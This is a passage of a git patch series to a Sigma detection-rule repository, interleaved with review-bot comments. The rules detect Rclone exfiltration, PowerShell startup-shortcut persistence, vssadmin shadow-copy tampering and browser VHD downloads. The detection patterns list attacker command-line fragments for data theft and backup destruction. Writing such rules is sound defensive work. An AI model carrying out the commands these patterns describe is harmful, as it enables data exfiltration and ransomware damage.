Roth Date: Sun, 24 Oct 2021 15:47:14 +0200 Subject: [PATCH 1309/1367] docs: changed title --- rules/network/net_pua_cryptocoin_mining_xmr.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml index 580d2861..e4506892 100644 --- a/rules/network/net_pua_cryptocoin_mining_xmr.yml +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml @@ -1,4 +1,4 @@ -title: Monero Crypto Coin Mining Pool Connection +title: Monero Crypto Coin Mining Pool Lookup id: b593fd50-7335-4682-a36c-4edcb68e4641 status: stable description: Detects suspicious DNS queries to Monero mining pools From d4b396f82358af07d96bd71f4c7549ea8dc2b359 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sun, 24 Oct 2021 11:02:34 -0500 Subject: [PATCH 1310/1367] Create sysmon_rclone_execution.yml --- .../deprecated/sysmon_rclone_execution.yml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 rules/windows/deprecated/sysmon_rclone_execution.yml diff --git a/rules/windows/deprecated/sysmon_rclone_execution.yml b/rules/windows/deprecated/sysmon_rclone_execution.yml new file mode 100644 index 00000000..3a0b7dfe --- /dev/null +++ b/rules/windows/deprecated/sysmon_rclone_execution.yml @@ -0,0 +1,46 @@ +title: RClone Execution +id: a0d63692-a531-4912-ad39-4393325b2a9c +status: experimental +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +tags: + - attack.exfiltration + - attack.t1567.002 +author: Bhabesh Raj, Sittikorn S +date: 2021/05/10 +modified: 2021/06/29 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware + - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a + - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone + - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate RClone use +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + Description: 'Rsync for cloud storage' + selection2: + CommandLine|contains|all: + - '--config ' + - '--no-check-certificate ' + - ' copy ' + selection3: + Image|endswith: + - '\rclone.exe' + CommandLine|contains: + - 'mega' + - 'pcloud' + - 'ftp' + - '--progress' + - '--ignore-existing' + - '--auto-confirm' + - '--transfers' + - '--multi-thread-streams' + condition: 1 of them From c4153f471f7514a7f65c86b6bbc82456d45488a5 Mon Sep 17 00:00:00 2001 
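Review bot: The rule is recreated under `rules/windows/deprecated/` but keeps `status: experimental` on its third line; a retired rule should carry `status: deprecated` so converters and rule tests can skip it, and PATCH 1312 already records the superseding rule through `related: … type: obsoletes`, so the two halves of the deprecation should agree. The same applies to the sibling file recreated in PATCH 1311 (`win_susp_rclone_exec.yml`, `status: experimental` on its fourth line). Bumping `modified:` to the retirement date (`modified: 2021/10/24`) would also record when the rule stopped being maintained.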
From: Austin Songer Date: Sun, 24 Oct 2021 11:02:55 -0500 Subject: [PATCH 1311/1367] Create win_susp_rclone_exec.yml --- .../deprecated/win_susp_rclone_exec.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/windows/deprecated/win_susp_rclone_exec.yml diff --git a/rules/windows/deprecated/win_susp_rclone_exec.yml b/rules/windows/deprecated/win_susp_rclone_exec.yml new file mode 100644 index 00000000..38f5b1c2 --- /dev/null +++ b/rules/windows/deprecated/win_susp_rclone_exec.yml @@ -0,0 +1,37 @@ +title: Rclone Execution via Command Line or PowerShell +id: cb7286ba-f207-44ab-b9e6-760d82b84253 +description: Detects Rclone which is commonly used by ransomware groups for exfiltration +status: experimental +date: 2021/05/26 +author: Aaron Greetham (@beardofbinary) - NCC Group +references: + - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ +tags: + - attack.exfiltration + - attack.t1567.002 +falsepositives: + - Legitimate Rclone usage (rare) +level: high +logsource: + product: windows + category: process_creation +detection: + exec_selection: + Image|endswith: '\rclone.exe' + ParentImage|endswith: + - '\PowerShell.exe' + - '\cmd.exe' + command_selection: + CommandLine|contains: + - ' pass ' + - ' user ' + - ' copy ' + - ' mega ' + - ' sync ' + - ' config ' + - ' lsd ' + - ' remote ' + - ' ls ' + description_selection: + Description: 'Rsync for cloud storage' + condition: command_selection and ( description_selection or exec_selection ) From 5ded3e681c89edb653b8173570179433093dc749 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:04:34 -0500 Subject: [PATCH 1312/1367] Update win_susp_rclone_execution.yml --- .../process_creation/win_susp_rclone_execution.yml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index eca69f3a..4b20bb67 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -3,7 +3,7 @@ id: e37db05d-d1f9-49c8-b464-cee1a4b11638 description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 -modified: 2021/10/23 +modified: 2021/10/24 author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ @@ -51,3 +51,9 @@ tags: falsepositives: - Legitimate RClone use level: high +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +related: + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes From 85d7cb6f3ed24823edc0b978ce93c21f10bc215e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 24 Oct 2021 11:06:51 -0500 Subject: [PATCH 1313/1367] Update process_creation_certoc_execution.yml --- .../process_creation/process_creation_certoc_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml index 698a73f3..cbb41014 100644 --- a/rules/windows/process_creation/process_creation_certoc_execution.yml +++ b/rules/windows/process_creation/process_creation_certoc_execution.yml @@ -1,4 +1,4 @@ -title: Install Certificate via CertOC.exe +title: Suspicious Load DLL via CertOC.exe id: 242301bc-f92f-4476-8718-78004a6efd9f description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. status: experimental 
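Review bot: After the retitle to `Suspicious Load DLL via CertOC.exe`, the unchanged `description:` on the next line still says the rule detects a user installing certificates, which no longer describes what the detection block added in PATCH 1293 (`CommandLine|contains|all` on `-LoadDLL` and `.dll`) matches, and it keeps the `to loads` grammar slip. `description: Detects CertOC.exe being used to load a DLL via its LoadDLL switch.` would keep title, description and selection consistent. The detection block itself lies outside this hunk.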
From db640f6080e0d875025c4b6c90d22ae3b91a5762 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 18:47:04 +0200 Subject: [PATCH 1314/1367] Update win_susp_rclone_execution.yml --- .../win_susp_rclone_execution.yml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 4b20bb67..5f185a57 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -1,5 +1,10 @@ title: Rclone Execution via Command Line or PowerShell -id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +related: + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 @@ -39,7 +44,7 @@ detection: - 'multi-thread-streams' - 'no-check-certificate ' description_selection: - Description: 'Rsync for cloud storage' + Description: 'Rsync for cloud storage' condition: command_selection and ( description_selection or exec_selection ) fields: - CommandLine @@ -51,9 +56,3 @@ tags: falsepositives: - Legitimate RClone use level: high -id: e37db05d-d1f9-49c8-b464-cee1a4b11638 -related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes From 75f4f439daba43d2e97a380e89441932228f1445 Mon Sep 17 00:00:00 2001 
From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 13:32:22 -0400 Subject: [PATCH 1315/1367] Create sysmon_powershell_startup_shortcuts --- .../sysmon_powershell_startup_shortcuts | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/file_event/sysmon_powershell_startup_shortcuts diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts b/rules/windows/file_event/sysmon_powershell_startup_shortcuts new file mode 100644 index 00000000..2f0b954b --- /dev/null +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts 
@@ -0,0 +1,33 @@ +title: PowerShell writing startup shortcuts +id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d +description: Attempts to detect PowerShell writing startup shortcuts. +status: experimental +references: + - https://redcanary.com/blog/intelligence-insights-october-2021/ + # We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. + # Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. + # In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" +notes: + - Atomic Test is avaiable. Copy and Paste the command into an elevated PowerShell to generate logs, then run the cleanup step. + https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder + + - Current SIGMA rule "Startup folder File Write" does not cover this activity, as it looks in the \ProgramData\ file path and not \AppData\. + https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/sysmon_startup_folder_file_write.yml +tags: + - attack.registry_run_keys_/_startup_folder + - attack.t1547.001 +date: 2021/10/24 +author: Christopher Peacock (@securepeacock), SCYTHE +level: high +logsource: + product: windows + category: file_event +detection: + selection: + Image|endswith: '\powershell.exe' + TargetFilename|contains: '\start menu\programs\startup\' + TargetFilename|endswith: '.lnk' + condition: selection +falsepositives: + - Unknown + - Depending on your environment accepted applications may leverage this at times. It is recomended to search for anomolies inidicative of malware. From 03301a065204f29f81b69f1c576d750475aaabfb Mon Sep 17 00:00:00 2001 
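Review bot: `- attack.registry_run_keys_/_startup_folder` is not a valid Sigma tag — tactic tags are the lowercase tactic name, so the pair should read `- attack.persistence` and `- attack.t1547.001`. `Image|endswith: '\powershell.exe'` does not cover PowerShell 7, whose binary is `pwsh.exe`; turning the value into a list with `- '\pwsh.exe'` closes that gap for the same `.lnk` write. `notes:` is not one of the standard Sigma top-level keys, so the rule schema check may reject it; its content fits as `references:` entries or as `#` comments. The prose also has several typos (`avaiable`, `recomended`, `anomolies inidicative`).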
From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 13:56:01 -0400 Subject: [PATCH 1316/1367] Rename sysmon_powershell_startup_shortcuts to sysmon_powershell_startup_shortcuts.yml --- ..._startup_shortcuts => sysmon_powershell_startup_shortcuts.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/file_event/{sysmon_powershell_startup_shortcuts => sysmon_powershell_startup_shortcuts.yml} (100%) diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml similarity index 100% rename from rules/windows/file_event/sysmon_powershell_startup_shortcuts rename to rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml From 90654858559ddac863ef4acb1d97c6bb80d07237 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 20:12:55 +0200 Subject: [PATCH 1317/1367] update detection --- .../process_creation/win_shadow_copies_deletion.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_shadow_copies_deletion.yml b/rules/windows/process_creation/win_shadow_copies_deletion.yml index 45e71b95..2828e962 100644 --- a/rules/windows/process_creation/win_shadow_copies_deletion.yml +++ b/rules/windows/process_creation/win_shadow_copies_deletion.yml @@ -4,7 +4,7 @@ status: stable description: Shadow Copies deletion using operating systems utilities author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/10/22 -modified: 2021/06/02 +modified: 2021/10/24 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://blog.talosintelligence.com/2017/05/wannacry.html 
@@ -13,6 +13,7 @@ references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 - https://github.com/Neo23x0/Raccine#the-process - https://github.com/Neo23x0/Raccine/blob/main/yara/gen_ransomware_command_lines.yar + - https://redcanary.com/blog/intelligence-insights-october-2021/ tags: - attack.defense_evasion - attack.impact @@ -38,6 +39,12 @@ detection: - delete - catalog - quiet # will match -quiet or /quiet + selection2: + Image|endswith: '\vssadmin.exe' + CommandLine|contains|all: + - resize + - shadowstorage + - unbounded condition: 1 of selection* fields: - CommandLine From 9ff310541aef0f2357ce9560d314095e6d8dc966 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 20:14:44 +0200 Subject: [PATCH 1318/1367] add selection3 --- rules/windows/process_creation/win_shadow_copies_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_shadow_copies_deletion.yml b/rules/windows/process_creation/win_shadow_copies_deletion.yml index 2828e962..8eaf9b84 100644 --- a/rules/windows/process_creation/win_shadow_copies_deletion.yml +++ b/rules/windows/process_creation/win_shadow_copies_deletion.yml @@ -39,7 +39,7 @@ detection: - delete - catalog - quiet # will match -quiet or /quiet - selection2: + selection3: Image|endswith: '\vssadmin.exe' CommandLine|contains|all: - resize From 265faf6337dbcd8ce7ffc10131c6d3d784fa8c1f Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 14:15:04 -0400 Subject: [PATCH 1319/1367] Update sysmon_powershell_startup_shortcuts.yml --- .../file_event/sysmon_powershell_startup_shortcuts.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
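Review bot: The new `selection2` in win_shadow_copies_deletion.yml matches `vssadmin resize shadowstorage … unbounded`, which is also run legitimately when an administrator lifts the shadow-storage cap, so the `falsepositives` section (outside this hunk) should name it, e.g. `- Legitimate administrator resizing shadow storage with vssadmin`. If the rule already defines a `selection2` above line 38, this duplicate key is silently taken as an override by PyYAML rather than reported; patch 1318 below renames the block to `selection3`, which suggests that was the case and would be worth a duplicate-key check in the test suite.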
diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml index 2f0b954b..70c82df3 100644 --- a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml @@ -1,4 +1,4 @@ -title: PowerShell writing startup shortcuts +title: PowerShell Writing Startup Shortcuts id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d description: Attempts to detect PowerShell writing startup shortcuts. status: experimental @@ -17,7 +17,7 @@ tags: - attack.registry_run_keys_/_startup_folder - attack.t1547.001 date: 2021/10/24 -author: Christopher Peacock (@securepeacock), SCYTHE +author: Christopher Peacock '@securepeacock', SCYTHE level: high logsource: product: windows From 8b45c6687c1aeaad234b82dd7f4df9fb88037aee Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Sun, 24 Oct 2021 16:07:40 -0400 Subject: [PATCH 1320/1367] Update sysmon_powershell_startup_shortcuts.yml --- .../sysmon_powershell_startup_shortcuts.yml | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml index 70c82df3..a7ed3cfa 100644 --- a/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml +++ b/rules/windows/file_event/sysmon_powershell_startup_shortcuts.yml 
@@ -1,18 +1,10 @@ title: PowerShell Writing Startup Shortcuts id: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d -description: Attempts to detect PowerShell writing startup shortcuts. +description: Attempts to detect PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" status: experimental references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - # We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. - # Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. - # In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" -notes: - - Atomic Test is avaiable. Copy and Paste the command into an elevated PowerShell to generate logs, then run the cleanup step. - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder - - - Current SIGMA rule "Startup folder File Write" does not cover this activity, as it looks in the \ProgramData\ file path and not \AppData\. 
- https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/sysmon_startup_folder_file_write.yml + - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder tags: - attack.registry_run_keys_/_startup_folder - attack.t1547.001 From e4d2b6e5d94a81ea9c77cc1dc516b2f68c230435 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 25 Oct 2021 09:07:22 +0200 Subject: [PATCH 1321/1367] add file_event_mal_vhd_download --- .../file_event_mal_vhd_download.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/file_event/file_event_mal_vhd_download.yml diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml new file mode 100644 index 00000000..9634cfff --- /dev/null +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -0,0 +1,28 @@ +title: Suspicious VHD Image Download From Browser +id: 8468111a-ef07-4654-903b-b863a80bbc95 +status: experimental +description: Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls +references: + - https://redcanary.com/blog/intelligence-insights-october-2021/ + - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ + - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ +author: frack113 +date: 2021/10/25 +tags: + - attack.resource_development + - attack.t1587.001 +logsource: + category: file_event + product: windows + definition: in sysmon add ".vhd " +detection: + selection: + - Image|endswith: + - chrome.exe + - firefox.exe + - microsoftedge.exe + - microsoftedgecp.exe + - msedge.exe + - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier + condition: selection +level: high \ No newline at end of file 
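Review bot: The rewritten `description` in sysmon_powershell_startup_shortcuts.yml drops the note that the existing `sysmon_startup_folder_file_write` rule only watches the `\ProgramData\` startup path and not `\AppData\`, which is the rationale for this rule existing; keep one sentence of it, e.g. `Complements the Startup Folder File Write rule, which covers only the ProgramData startup path.` Embedding the full Red Canary quotation also makes the `description` line very long; a short paraphrase, with the blog post kept under `references`, reads better. The rest of the rule is outside this hunk.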
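Review bot: The `selection` in the new file_event_mal_vhd_download.yml is a list of two maps, which Sigma combines with OR, so as written the rule fires on every file written by the listed browsers regardless of name and on every `.vhd` write by any process; make it a single map by dropping the list dashes so that `Image|endswith:` and `TargetFilename|contains: '.vhd'` sit at the same indentation directly under `selection:`. The browser names should be anchored with a leading backslash (`- '\chrome.exe'`), because `endswith: chrome.exe` also matches any image whose name merely ends in those characters. `contains: '.vhd'` additionally matches paths such as `archive.vhd.txt`; if the intent is the Zone.Identifier stream, as the comment on the `TargetFilename` line says, an `endswith` list of `.vhd`, `.vhdx` and `.vhd:Zone.Identifier` is tighter.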
From 12707f8ec5ee41e81aa5828ece3f8b91858462ad Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 25 Oct 2021 09:16:59 +0200 Subject: [PATCH 1322/1367] fix level --- rules/windows/file_event/file_event_mal_vhd_download.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml index 9634cfff..2ddeca79 100644 --- a/rules/windows/file_event/file_event_mal_vhd_download.yml +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -25,4 +25,6 @@ detection: - msedge.exe - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier condition: selection -level: high \ No newline at end of file +falsepositives: + - Legitimate user creation +level: medium From 5294e91828f77ab40a3441ec71cba06506633e39 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 17:29:01 +0200 Subject: [PATCH 1323/1367] Update file_event_mal_vhd_download.yml --- rules/windows/file_event/file_event_mal_vhd_download.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml index 2ddeca79..ec4aa319 100644 --- a/rules/windows/file_event/file_event_mal_vhd_download.yml +++ b/rules/windows/file_event/file_event_mal_vhd_download.yml @@ -6,7 +6,7 @@ references: - https://redcanary.com/blog/intelligence-insights-october-2021/ - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/ - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ -author: frack113 +author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' date: 2021/10/25 tags: - attack.resource_development 
@@ -23,6 +23,9 @@ detection: - microsoftedge.exe - microsoftedgecp.exe - msedge.exe + - iexplorer.exe + - brave.exe + - opera.exe - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier condition: selection falsepositives: From 162d869e2bd513f371606e9ee39445db135d2f69 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 25 Oct 2021 18:14:03 +0200 Subject: [PATCH 1324/1367] Add cve tags --- .../sysmon_cve_2021_26858_msexchange.yml | 3 +-- .../win_exploit_cve_2020_10189.yml | 3 +-- ..._susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../win_susp_servu_process_pattern.yml | 2 +- ..._cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- .../sysmon_registry_susp_printer_driver.yml | 2 +- .../win_registry_mimikatz_printernightmare.yml | 4 ++-- tests/test_rules.py | 18 ++++-------------- 8 files changed, 13 insertions(+), 25 deletions(-) diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 84390c48..acce751b 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -7,13 +7,12 @@ author: Bhabesh Raj status: experimental level: critical references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858 - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ - - https://nvd.nist.gov/vuln/detail/cve-2021-26858 date: 2021/03/03 tags: - attack.t1203 - attack.execution + - cve.2021.26858 logsource: category: file_event product: windows diff --git a/rules/windows/process_creation/win_exploit_cve_2020_10189.yml b/rules/windows/process_creation/win_exploit_cve_2020_10189.yml index 10aaacd2..0b591d74 100644 --- a/rules/windows/process_creation/win_exploit_cve_2020_10189.yml 
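Review bot: `iexplorer.exe` in the extended `Image|endswith` list of file_event_mal_vhd_download.yml is not the Internet Explorer binary name, which is `iexplore.exe`, so that entry never matches; change it to `- '\iexplore.exe'`. The same leading-backslash anchoring applies to the `brave.exe` and `opera.exe` entries added here, since an unanchored `endswith` also matches longer image names ending in those characters.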
+++ b/rules/windows/process_creation/win_exploit_cve_2020_10189.yml @@ -4,8 +4,6 @@ status: experimental description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189 - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 author: Florian Roth date: 2020/03/25 @@ -18,6 +16,7 @@ tags: - attack.t1059.003 - attack.t1059 # an old one - attack.s0190 + - cve.2020.10189 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index 4056fcdb..25032789 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -6,13 +6,13 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.persistence - attack.t1136.001 + - cve.2021.35211 # - threat_group.DEV-0322 detection: selection1: diff --git a/rules/windows/process_creation/win_susp_servu_process_pattern.yml b/rules/windows/process_creation/win_susp_servu_process_pattern.yml index 90b50893..c1a92be5 100644 --- a/rules/windows/process_creation/win_susp_servu_process_pattern.yml +++ b/rules/windows/process_creation/win_susp_servu_process_pattern.yml 
@@ -6,12 +6,12 @@ author: Florian Roth date: 2021/07/14 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ - - https://nvd.nist.gov/vuln/detail/cve-2021-35211 logsource: category: process_creation product: windows tags: - attack.credential_access + - cve.2021.35211 detection: selection: ParentImage|endswith: '\Serv-U.exe' diff --git a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml index 1126237c..5a9aa6a1 100644 --- a/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -8,12 +8,12 @@ modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ - - https://nvd.nist.gov/vuln/detail/cve-2021-33771 - - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 + - cve.2021.33771 + - cve.2021.31979 # - threat_group.Sourgum logsource: product: windows diff --git a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml index ad3f790d..c7373356 100644 --- a/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml +++ b/rules/windows/registry_event/sysmon_registry_susp_printer_driver.yml 
@@ -4,11 +4,11 @@ status: experimental description: Detects a suspicious printer driver installation with an empty Manufacturer value references: - https://twitter.com/SBousseaden/status/1410545674773467140 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Florian Roth date: 2020/07/01 tags: - attack.privilege_escalation + - cve.2021.1675 logsource: category: registry_event product: windows diff --git a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml index db8f4a1f..22fa2806 100644 --- a/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml +++ b/rules/windows/registry_event/win_registry_mimikatz_printernightmare.yml @@ -6,11 +6,11 @@ references: - https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760 - https://www.lexjansen.com/sesug/1993/SESUG93035.pdf - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 - - https://nvd.nist.gov/vuln/detail/cve-2021-1675 - - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: Markus Neis, @markus_neis, Florian Roth tags: - attack.execution + - cve.2021.1675 + - cve.2021.34527 date: 2021/07/04 modified: 2021/07/28 logsource: diff --git 